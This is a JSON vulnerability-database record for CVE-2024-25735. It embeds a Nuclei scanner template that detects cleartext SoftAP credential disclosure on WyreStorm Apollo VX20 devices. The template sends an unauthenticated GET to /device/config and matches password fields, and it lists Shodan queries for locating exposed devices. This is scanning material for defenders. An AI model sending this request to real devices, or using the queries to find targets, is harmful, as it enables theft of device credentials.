{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-25735/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-25735/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-25735/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-25735/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-25735/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-25735"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-25735"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-25735.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2024-25735\n\ninfo:\n  name: WyreStorm Apollo VX20 - Information Disclosure\n  author: johnk3r\n  severity: high\n  description: |\n    An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n  impact: |\n    Unauthenticated attackers can access cleartext credentials for the SoftAP Router via the /device/config endpoint.\n  remediation: |\n    Update WyreStorm Apollo VX20 to version 1.3.58 or later.\n  reference:\n    - https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt\n    - https://packetstormsecurity.com/files/cve/CVE-2024-25735\n    - http://packetstormsecurity.com/files/177082\n    - https://hyp3rlinx.altervista.org\n    - https://github.com/codeb0ss/CVE-2024-25735-PoC\n  classification:\n    epss-score: 0.50622\n    epss-percentile: 0.98867\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: wyrestorm\n    product: apollo vx20\n    shodan-query:\n      - ssl:\"WyreStorm Apollo VX20\"\n      - ssl:\"wyrestorm apollo vx20\"\n  tags: packetstorm,cve,cve2024,wyrestorm,info-leak,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/device/config\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - '\"password\":'\n          - '\"softAp\":'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100863c6dc8ce8ef2a7763fd795c53c8b13ccd6b5b4fbb56ee07d6eaa773b98c25802203e13293d0ae3f6b70b15050d793a1c3cbaa67786171307761f8078b12154700a:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-25735"
}